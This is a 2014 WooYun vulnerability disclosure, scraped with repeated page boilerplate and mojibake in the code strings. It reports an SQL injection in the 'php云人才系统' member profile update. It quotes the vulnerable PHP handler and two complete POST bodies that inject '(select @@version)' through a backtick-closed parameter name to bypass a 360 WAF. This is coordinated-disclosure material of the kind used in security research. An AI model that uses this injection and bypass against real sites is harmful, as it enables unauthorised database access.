云人才系统SQL注入，绕过WAF | wooyun-2014-060166| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-060166

漏洞标题：云人才系统SQL注入，绕过WAF

漏洞作者：酱油甲

提交时间：2014-05-11 15:39

修复时间：2014-08-09 15:40

公开时间：2014-08-09 15:40

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-11：细节已通知厂商并且等待厂商处理中
2014-05-11：厂商已经确认，细节仅向厂商公开
2014-05-14：细节向第三方安全合作伙伴开放
2014-07-05：细节向核心白帽子及相关领域专家公开
2014-07-15：细节向普通白帽子公开
2014-07-25：细节向实习白帽子公开
2014-08-09：细节向公众公开

简要描述：

云人才系统SQL注入，绕过WAF

详细说明：

云人才系统SQL注入，绕过了360的WAF~~
首先需要注册一个普通用户~
比如官方演示站点：

然后来到
http://www.hr135.com/member/index.php?M=index&C=info
可以看到有某数字的WAF：

于是我们发现代码如下：

function info_action(){
		if($_POST["submitBtn"]){
			$_POST=$this->post_trim($_POST);
			if($_POST["name"]==""){
				$this->obj->ACT_msg("index.php?C=info","��������Ϊ�գ�");
			}
			if($_POST["city"]==""){
				$this->obj->ACT_msg("index.php?C=info","�������ڵز���Ϊ�գ�");
			}
			if($this->config['user_idcard']=="1")
			{
				if($_POST["idcard"]==""){
					$this->obj->ACT_msg("index.php?C=info","���֤���벻��Ϊ�գ�");
				}
			}
			if($_POST["cityid"]==""){
				$this->obj->ACT_msg("index.php?C=info","�־�ס�ز���Ϊ�գ�");
			}
			if($_POST["address"]==""){
				$this->obj->ACT_msg("index.php?C=info","��ϸ��ַ����Ϊ�գ�");
			}
			unset($_POST["submitBtn"]);
			$this->obj->delfiledir("../upload/tel/".$this->uid);
			$where["uid"]=$this->uid;
			$nid=$this->obj->update_once("resume",$_POST,$where);

最后update_once的时候直接把$_POST带入，然后再处理数组，而且想到如果不使用等号，就能绕过WAF，于是就使用反引号闭合来注入：
火狐插件提交语句为：

name=123123&sex=6&birthday=1988-01-01&marriage=8&height=&nationality=&weight=&province=3&city=38&three_city=400&idcard=&telphone=13989765678&telhome=&email=testtest%40testtest.com&edu=9&provinceid=9&cityid=88&three_cityid=485&exp=18&address=dsfsdfdsfsdf&submitBtn=+%B1%A3+%B4%E6&description%60%3D%28select+%40%40version%29%23=123

也可以使用burp提交：

name=123123&sex=6&birthday=1988-01-01&marriage=8&height=&nationality=&weight=&province=3&city=38&three_city=400&idcard=&telphone=13989765678&telhome=&email=testtest%40testtest.com&edu=9&provinceid=9&cityid=88&three_cityid=485&exp=18&address=dsfsdfdsfsdf&submitBtn=%2B%B1%A3%2B%B4%E6&description%60%3D%28select%2B%40%40version%29%23=123

~这里就绕过了WAF限制~~

漏洞证明：

看看效果：
VERSION

数据库路径：

数据库用户：

修复方案：

过滤

版权声明：转载请注明来源酱油甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-05-11 15:47

厂商回复：

感谢您的提供，我们会尽快修复！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-060166

漏洞标题：云人才系统SQL注入，绕过WAF

相关厂商：php云人才系统

漏洞作者：酱油甲

提交时间：2014-05-11 15:39

修复时间：2014-08-09 15:40

公开时间：2014-08-09 15:40

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源酱油甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-060166

漏洞标题：云人才系统SQL注入，绕过WAF

相关厂商：php云人才系统

漏洞作者： 酱油甲

提交时间：2014-05-11 15:39

修复时间：2014-08-09 15:40

公开时间：2014-08-09 15:40

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-060166"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 酱油甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：酱油甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源酱油甲@乌云